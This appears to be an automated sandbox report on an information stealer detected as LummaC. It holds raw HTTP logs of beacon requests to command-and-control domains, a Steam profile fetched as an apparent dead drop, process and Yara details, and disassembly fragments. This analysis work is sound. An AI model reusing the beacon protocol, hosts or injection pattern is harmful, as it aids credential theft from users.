                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: ehticsprocw.sbs
                                                                                                                2024-10-13 10:00:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:32 UTC823INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:32 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=ljndontpklbau2stdhr9nfd8oa; expires=Thu, 06 Feb 2025 03:47:11 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3NsRL0fqHa%2BJkifqdvDXWhzJ6RnB7hArEJUIogE1r8dk1ZznP5xSO6cw%2FLl8dEFvC%2BK6LitP0%2FQVFXc0lxmJqT0rixRNmIA45oO1vGXtuuzlQA66W4KP1e3XqO7tmPFgMGc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bb37b7d4346-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-10-13 10:00:32 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                2024-10-13 10:00:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.449742104.21.79.354434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:33 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: condifendteu.sbs
                                                                                                                2024-10-13 10:00:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:33 UTC819INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:33 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=af78kgige2gb6463lvlpd06ma1; expires=Thu, 06 Feb 2025 03:47:12 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HbJ0YNBFpQQIatPdEt2RYZI2yFNYnSmE%2BYXT7sPwF1ik%2BQnG8gEBoxLhs2YH7T4SW1Muf6UDVRhTyWhEWT34qpfblbz0rwcEhpRz3gDxRNvPXEEmqjO7aL1gE7HJu5Rz%2BhqM"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bb9bd9519d3-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-10-13 10:00:33 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                2024-10-13 10:00:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.449744104.102.49.2544434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:34 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Host: steamcommunity.com
                                                                                                                2024-10-13 10:00:35 UTC1870INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                Cache-Control: no-cache
                                                                                                                Date: Sun, 13 Oct 2024 10:00:35 GMT
                                                                                                                Content-Length: 34837
                                                                                                                Connection: close
                                                                                                                Set-Cookie: sessionid=d8a5315e6278e0fd2506466e; Path=/; Secure; SameSite=None
                                                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                2024-10-13 10:00:35 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                2024-10-13 10:00:35 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                2024-10-13 10:00:35 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                2024-10-13 10:00:35 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.449745172.67.206.2044434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:36 UTC264OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: sergei-esenin.com
                                                                                                                2024-10-13 10:00:36 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:36 UTC553INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:36 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GpxYmnI6gY76Vm%2FBokmbyCcHK%2BTYmOeoEVw4DwezuaZexBRsSAcH2uW9wQgu5JcBZLEe3Q6WYkINIJNSjQYECOlNpZA5oo9PzJTrPbI53UIz%2Bz65gPgge7RTlUskkd4YN7T1XA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bca3a1b80d0-EWR
                                                                                                                2024-10-13 10:00:36 UTC816INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                2024-10-13 10:00:36 UTC1369INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
                                                                                                                Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
                                                                                                                2024-10-13 10:00:36 UTC1369INData Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
                                                                                                                Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
                                                                                                                2024-10-13 10:00:36 UTC887INData Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
                                                                                                                Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
                                                                                                                2024-10-13 10:00:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.449746172.67.206.2044434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:36 UTC354OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Cookie: __cf_mw_byp=vKrz3Hq72H1UNZmiSDnI_ARtZuyd8ck1abtebasc0mE-1728813636-0.0.1.1-/api
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 77
                                                                                                                Host: sergei-esenin.com
                                                                                                                2024-10-13 10:00:36 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 32 32 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--222&j=5c9b8674a630d9101b46733aa37f15ec
                                                                                                                2024-10-13 10:00:37 UTC825INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:37 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=3gppu7i2660mo2agck4pb8lmtt; expires=Thu, 06 Feb 2025 03:47:16 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3G9vi70KVd1wg5YPJrZAkk0e91uS1AVxeJRYypUY4qSk9cMQmhXcvLLJdaZuAVX1af1Jv7ujAeX1jhZCEyRg19veGqF7tbQaPkk2NNAB8G9kn4dIDo%2BCUkExMK8ZkdGRmbL%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bceab7c8c77-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-10-13 10:00:37 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                2024-10-13 10:00:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:06:00:07
                                                                                                                Start date:13/10/2024
                                                                                                                Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                Imagebase:0x790000
                                                                                                                File size:19'250'176 bytes
                                                                                                                MD5 hash:F1113FD6005B558B0A9624EDD97DBD58
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1919656324.0000000003D6B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1919656324.0000000003DC2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:1
                                                                                                                Start time:06:00:16
                                                                                                                Start date:13/10/2024
                                                                                                                Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                Imagebase:0x760000
                                                                                                                File size:231'736 bytes
                                                                                                                MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:7
                                                                                                                Start time:06:00:36
                                                                                                                Start date:13/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1648
                                                                                                                Imagebase:0x630000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:2.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:59.5%
                                                                                                                  Total number of Nodes:121
                                                                                                                  Total number of Limit Nodes:11
                                                                                                                  execution_graph 19405 43c683 19406 43c688 19405->19406 19407 43c68e VariantClear 19406->19407 19408 43c6a0 SysFreeString SysFreeString 19407->19408 19410 43c6d5 SysFreeString 19408->19410 19411 43c6e9 19410->19411 19412 43c702 GetVolumeInformationW 19411->19412 19418 43c7e9 19412->19418 19420 43c723 19412->19420 19413 43c92a 19425 43fad0 19413->19425 19416 43c8de 19416->19413 19429 43fe30 19416->19429 19433 43fd10 19416->19433 19437 43fec0 19416->19437 19420->19413 19420->19416 19420->19418 19424 4425f0 LdrInitializeThunk 19420->19424 19424->19416 19426 43fae6 RtlFreeHeap 19425->19426 19427 43c930 19425->19427 19426->19427 19427->19418 19445 4425f0 LdrInitializeThunk 19427->19445 19430 43fe8e 19429->19430 19431 43fe3a 19429->19431 19430->19416 19431->19430 19446 4425f0 LdrInitializeThunk 19431->19446 19434 43fd21 19433->19434 19435 43fdbe 19433->19435 19434->19435 19447 4425f0 LdrInitializeThunk 19434->19447 19435->19416 19438 43fed2 19437->19438 19444 43ff33 19437->19444 19439 43ff2e 19438->19439 19438->19444 19448 4425f0 LdrInitializeThunk 19438->19448 19439->19439 19441 44001e 19439->19441 19449 4425f0 LdrInitializeThunk 19439->19449 19441->19444 19450 4425f0 LdrInitializeThunk 19441->19450 19444->19416 19445->19418 19446->19430 19447->19435 19448->19439 19449->19441 19450->19444 19451 40cd80 19452 40cd8c 19451->19452 19453 40cd94 IsUserAnAdmin 19452->19453 19454 40cf6d ExitProcess 19452->19454 19455 40cd9f 19453->19455 19456 40cda7 GetInputState 19455->19456 19457 40cf68 19455->19457 19459 40cdc0 19456->19459 19474 442520 19457->19474 19459->19459 19460 40cdd4 GetCurrentThreadId GetCurrentProcessId 19459->19460 19461 40ce00 19460->19461 19461->19457 19465 410ce0 CoInitialize 19461->19465 19463 40cf63 19473 40f9f0 FreeLibrary 19463->19473 19466 410d51 CoInitializeSecurity 19465->19466 19467 4110b1 CoUninitialize 19465->19467 19468 4110c1 GetSystemDirectoryW 19465->19468 19469 4110b7 19465->19469 19471 410d73 19465->19471 19466->19467 19466->19468 19470 41113e 19466->19470 19466->19471 19467->19469 19468->19471 19469->19463 19470->19463 19471->19467 19471->19468 19471->19470 19472 43fad0 RtlFreeHeap 19471->19472 19472->19471 19473->19457 19477 443980 19474->19477 19476 442525 FreeLibrary 19476->19454 19478 443989 19477->19478 19478->19476 19479 43c1e2 19480 43c210 19479->19480 19480->19480 19481 43c224 SysAllocString 19480->19481 19482 43c24c 19481->19482 19488 40ec8b 19491 40f340 19488->19491 19495 40f3d0 19491->19495 19492 40f97d 19494 442540 2 API calls 19492->19494 19496 40eca2 19494->19496 19495->19492 19495->19496 19497 442540 19495->19497 19498 44255b 19497->19498 19499 4425cb 19497->19499 19500 442569 19497->19500 19502 4425c0 19497->19502 19498->19499 19498->19500 19501 43fad0 RtlFreeHeap 19499->19501 19500->19500 19503 4425a8 RtlReAllocateHeap 19500->19503 19501->19502 19502->19492 19503->19502 19504 4432aa GetForegroundWindow 19505 4432b8 19504->19505 19506 43c0ac 19508 43c0ab 19506->19508 19507 43c192 CoCreateInstance 19507->19507 19507->19508 19509 43c0a0 19507->19509 19508->19506 19508->19507 19510 442f74 19511 442f90 19510->19511 19512 442ffe 19511->19512 19516 4425f0 LdrInitializeThunk 19511->19516 19515 4425f0 LdrInitializeThunk 19512->19515 19515->19512 19516->19512 19517 43fab2 RtlAllocateHeap 19518 442c56 19520 442ca0 19518->19520 19519 442dee 